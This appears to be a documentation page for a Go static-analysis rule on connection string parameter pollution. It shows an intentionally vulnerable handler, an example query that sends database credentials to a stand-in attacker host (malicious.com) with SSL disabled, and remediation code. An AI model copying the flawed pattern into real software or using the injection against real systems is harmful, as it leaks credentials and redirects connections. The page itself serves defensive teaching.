Connection String Parameter Pollution

ID

go.connection_string_parameter_pollution

Severity

critical

Resource

Resource Management

Language

Go

Tags

CWE:15, NIST.SP.800-53, OWASP:2021:A5, PCI-DSS:6.5.1

Description

External control of connection string.

Rationale

Database connectivity typically involves constructing a connection string – a snippet of text encoding the details of the connection to the database, such as hostname, database name, and credentials.

When user input is improperly included in a connection string, it can lead to parameter pollution. This means that the attacker can inject additional parameters or override existing ones, potentially accessing databases they shouldn’t or altering their privileges.

Below is a vulnerable Golang code snippet demonstrating this issue:

package connection_string_parameter_pollution

import (
	"database/sql"
	"fmt"
	"log"
	"net/http"

	_ "github.com/lib/pq"
)

func connectToDatabase(userHost string) (*sql.DB, error) {
	if userHost == "" {
		return nil, fmt.Errorf("Host parameter is empty")
	}

	connStr := fmt.Sprintf("postgres://user:password@%s/mydb?sslmode=disable", userHost)
	db, err := sql.Open("postgres", connStr) // FLAW
	if err != nil {
		return nil, err
	}

	return db, nil
}

func handler(w http.ResponseWriter, r *http.Request) {
	userHost := r.URL.Query().Get("host")
	db, err := connectToDatabase(userHost)
	if err != nil {
		http.Error(w, "Database connection error", http.StatusInternalServerError)
		log.Print("Connection error: ", err)
		return
	}
	defer db.Close()

	fmt.Fprintf(w, "Connected to database at %s", userHost)
}

func main() {
	http.HandleFunc("/", handler)
	log.Fatal(http.ListenAndServe(":8080", nil))
}

If an attacker submits the following query:

/?host=localhost:5432@malicious.com/mydb?sslmode=disable

With the format string used above, the resulting connection string becomes:

postgres://user:password@localhost:5432@malicious.com/mydb?sslmode=disable/mydb?sslmode=disable

Go's URL parser treats the last @ as the end of the user-info section, so the credentials are sent to malicious.com rather than to localhost, and the attacker-supplied query parameters take effect.

This could:

  • Redirect the connection to an attacker-controlled host.

  • Disable SSL/TLS encryption.

  • Leak credentials.

Remediation

Mitigating connection string parameter pollution involves several key practices:

  1. Use Parameter Objects: Avoid concatenating user input into connection strings. Instead, use APIs or configurations that separate parameters from the connection logic.

  2. Validate and Sanitize User Input: If user input must be incorporated into the connection process, ensure it is strictly validated and sanitized according to expected patterns.

  3. Environment Configuration: Use environment variables or configuration files to manage sensitive credential information away from user modification capabilities.
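The following Go snippet is an added example, not code from this page or the detector, showing practices 1 to 3 together: the user-supplied host is validated against a strict pattern and an allowlist, the DSN is assembled with net/url so no component can spill into another, and credentials are passed in from configuration rather than the request. The allowlisted hostnames, the default port and the sslmode value are assumptions.

```go
package main

import (
	"fmt"
	"net"
	"net/url"
	"regexp"
	"strconv"
)

// hostPattern accepts only DNS-label hostnames, so URL delimiters such as
// '@', '/', '?' and ':' can never reach the connection string.
var hostPattern = regexp.MustCompile(
	`^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$`)

// allowedHosts is an assumed allowlist of database hosts the service may reach.
var allowedHosts = map[string]bool{"db-primary.internal": true, "db-replica.internal": true}

// validateHost checks a user-supplied "host" or "host:port" value and returns the
// canonical host and numeric port, or an error if any part is not acceptable.
func validateHost(userHost string) (string, int, error) {
	host, portStr, err := net.SplitHostPort(userHost)
	if err != nil { // no port given: treat the whole value as the host (assumed default 5432)
		host, portStr = userHost, "5432"
	}
	if !hostPattern.MatchString(host) {
		return "", 0, fmt.Errorf("host contains characters that are not allowed")
	}
	if !allowedHosts[host] {
		return "", 0, fmt.Errorf("host %q is not in the allowlist", host)
	}
	port, err := strconv.Atoi(portStr)
	if err != nil || port < 1 || port > 65535 {
		return "", 0, fmt.Errorf("port %q is not a valid TCP port", portStr)
	}
	return host, port, nil
}

// buildDSN assembles the connection string with net/url so every component is
// escaped and cannot spill into another; credentials come from configuration, never the request.
func buildDSN(user, password, host string, port int, dbName string) string {
	u := url.URL{
		Scheme:   "postgres",
		User:     url.UserPassword(user, password),
		Host:     net.JoinHostPort(host, strconv.Itoa(port)),
		Path:     "/" + dbName,
		RawQuery: url.Values{"sslmode": {"verify-full"}}.Encode(),
	}
	return u.String()
}
```

A handler would call validateHost on the request value, then buildDSN with credentials read from the environment, and pass the result to sql.Open.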

Configuration

The detector has the following configurable parameters:

  • sources, which indicates the source kinds to check.

  • neutralizations, which indicates the neutralization kinds to check.

Unless you need to change the default behavior, you typically do not need to configure this detector.

References